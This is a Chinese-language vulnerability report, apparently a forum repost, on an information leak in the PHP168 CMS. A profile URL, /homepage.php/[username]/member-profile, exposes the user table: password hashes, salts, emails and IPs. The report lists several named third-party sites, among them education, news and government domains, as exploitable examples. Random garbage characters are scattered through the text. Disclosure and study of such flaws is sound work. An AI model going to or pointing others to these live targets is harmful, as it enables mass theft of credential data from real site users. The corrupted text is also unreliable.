|
简要描述: 国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。 详细说明:PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile8 X% [* Q2 R r q' n+ n
* K1 `5 G+ P: ~' L* `; [
以PHP168官方演示站点为例,查看任意用户信息的页面链接为:
- p+ i6 J/ }) v! ]1 y; E9 n2 A# l# h6 m
http://php168.cn/com/homepage.php/admin/member-profile& f& ?2 o A% U# |) \
% R4 R0 i, ~% Q5 J# \1 K7 x+ \由于该模块代码中出现了一句神奇的array,导致用户数据表内所有数据被当作数组取出直接显示出来。( q/ r7 p5 y- e$ \
http://www.myhack58.com/Article/UploadPic/2013-9/2013920918425520.jpg
& a7 W8 c9 x; ^( f7 ^& e5 H2 H; P1 `- ?0 v3 I) |$ J3 r$ P
漏洞证明:该漏洞影响使用该CMS系统的站点,以PHP168官网上的客户案例为例:6 Q1 c2 k' F7 q
1 x3 x/ ^. O6 @3 T8 P4 H. p
http://www.zjfzol.com.cn/homepage.php/admin/member-profile
% t; P# r& }' m* p( {
* x q4 u% J O5 Rhttp://www.scswl.cn/homepage.php/admin/member-profile
e* D3 U: u8 r. U" q$ G; h& ?: U. j
http://www.tunet.edu.cn/homepage.php/admin/member-profile2 g! s8 Q; ?: O m5 Q' w% b
# v8 O5 w8 j3 x# A; hhttp://www.itlead.com.cn/homepage.php/admin/member-profile- u3 _8 {$ k, Q0 |
8 }( f+ p. i7 @' t4 Thttp://www.aedp.cn/homepage.php/admin/member-profile( w1 p8 {0 S# s" g: b9 @! s
- v, f/ u o/ e+ j) @9 w: b5 [
http://www.qianlongnews.com/homepage.php/test/member-profile/ ^+ x% R. o- J8 y. V( T" i3 H
8 H' I6 B# x1 L9 r: k6 z
http://ny.zlxk.com/gov/homepage.php/admin/member-profile 修复方案:去掉输出 [/td][/tr]* O7 C' i7 V' v( `# \
[/table] |